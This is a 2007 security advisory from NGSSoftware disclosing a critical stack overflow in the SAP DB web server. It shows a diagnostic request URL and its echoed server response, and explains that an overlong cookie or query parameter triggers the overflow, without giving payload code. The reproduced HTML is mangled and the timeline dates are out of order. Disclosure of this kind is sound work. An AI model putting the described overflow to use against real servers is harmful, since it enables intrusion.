Critical Risk Vulnerability in SAP DB Web Server (Stack Overflow)

=======
Summary
=======
Name: SAP DB Web Server Stack Overflow
Release Date: 5 July 2007
Reference: NGS00486
Discover: Mark Litchfield lt;mark@ngssoftware.com
Vendor: SAP
Vendor Reference: SECRES-291
Systems Affected: All Versions
Risk: Critical
Status: Fixed

========
TimeLine
========
Discovered: 3 January 2007
Released: 19 January 2007
Approved: 29 January 2007
Reported: 11 January 2007
Fixed: 27 March 2007
Published:

===========
Description
===========
SAP DB is an open source database server sponsored by SAP AG that provides
a series of web tools to administer database servers via web browsers.
These tools can be integrated into third-party web servers such as IIS, or
run on its own web server which by default is installed to TCP Port 9999.

When installed as its own web server, the process waHTTP.exe is found to
be listening on TCP Port 9999.

=================
Technical Details
=================
http://target:9999/webdbm?Event=DBM_INTERN_TEST Action=REFRESH

Looking at the 200 response we can determine the function offered by the
request:

lt;body topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
background=/WARoot/Images/tatami.gif
lt;a href=”javascript:parent.GotoWebDBMURL(this,
‘Event=DBM_INTERN_TEST Action=REFRESH’)”Test lt;/a lt;table
style=”font-family:courier new,monospace; font-size:8pt;” border=1
cellspacing=0 cellpadding=1

lt;tr lt;tdsapdbwa_GetRequestURI nbsp; lt;/td lt;td/webdbm nbsp; lt;/td lt;/tr
lt;tr lt;tdsapdbwa_GetIfModifiedSince nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdsapdbwa_GetQueryString nbsp; lt;/td lt;tdEvent=DBM_INTERN_TEST Action=REFRESH nbsp; lt;/td lt;/tr
lt;tr lt;tdsapdbwa_GetPathInfo nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdsapdbwa_GetMethod nbsp; lt;/td lt;tdGET nbsp; lt;/td lt;/tr
lt;tr lt;tdsapdbwa_GetContentType nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdsapdbwa_GetContentLength nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdsapdbwa_GetPathTranslated nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdsapdbwa_GetServerName nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdAUTH_TYPE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdCONTENT_LENGTH nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdCONTENT_TYPE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdGATEWAY_INTERFACE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_ACCEPT nbsp; lt;/td lt;td/ nbsp; lt;/td lt;/tr
lt;tr lt;tdPATH_INFO nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdQUERY_STRING nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdREMOTE_ADDR nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdREMOTE_HOST nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdREMOTE_USER nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdREQUEST_METHOD nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdSCRIPT_NAME nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdSERVER_NAME nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdSERVER_PORT nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdSERVER_PROTOCOL nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdSERVER_SOFTWARE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_ACCEPT nbsp; lt;/td lt;td/ nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_ACCEPT_CHARSET nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_ACCEPT_ENCODING nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_ACCEPT_LANGUAGE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_ACCEPT_RANGES nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_AGE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_ALLOW nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_AUTHORIZATION nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_CACHE_CONTROL nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_CONNECTION nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_CONTENT_ENCODING nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_CONTENT_LANGUAGE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_CONTENT_LENGTH nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_CONTENT_LOCATION nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_CONTENT_MD5 nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_CONTENT_RANGE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_CONTENT_TYPE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_DATE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_ETAG nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_EXPECT nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_EXPIRES nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_FROM nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_HOST nbsp; lt;/td lt;tdlocalhost nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_IF_MATCH nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_IF_MODIFIED_SINCE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_IF_NONE_MATCH nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_IF_RANGE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_IF_UNMODIFIED_SINCE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_LAST_MODIFIED nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_LOCATION nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_MAX_FORWARDS nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_PRAGMA nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_PROXY_AUTHENTICATE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_PROXY_AUTHORIZATION nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_RANGE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_REFERER nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_RETRY_AFTER nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_SERVER nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_TE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_TRAILER nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_TRANSFER_ENCODING nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_UPGRADE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_USER_AGENT nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_VARY nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_VIA nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_WARNING nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_WWW_AUTHENTICATE nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_COOKIE nbsp; lt;/td lt;tdSID=E63A7F73B20A5021442BAF3C8F70B97A nbsp; lt;/td lt;/tr
lt;tr lt;tdHTTP_SESSION_ID nbsp; lt;/td lt;tdNULL nbsp; lt;/td lt;/tr
lt;tr lt;tdEvent nbsp; lt;/td lt;tdDBM_INTERN_TEST nbsp; lt;/td lt;/tr
lt;tr lt;tdAction nbsp; lt;/td lt;tdREFRESH nbsp; lt;/td lt;/tr
lt;/table
lt;/body

By making the request again, but ammeding the Cookie Value, or if one is
not prersent, simply add it as an HTTP header request, we can cause a
stack based overflow within WAHTTP.exe

The same Overflow can also be achieved in numerous other fields.

If we take the sapdbwa_GetQueryString, we can simply pass an additional
parameter by appending + string

===============
Fix Information
===============
Please ensure you are running the latest version

NGSSoftware Insight Security Research
a href=”http://www.ngssoftware.com/”http://www.ngssoftware.com//a
a href=”http://www.databasesecurity.com/”http://www.databasesecurity.com//a
a href=”http://www.nextgenss.com/”http://www.nextgenss.com//a
+44(0)208 401 0070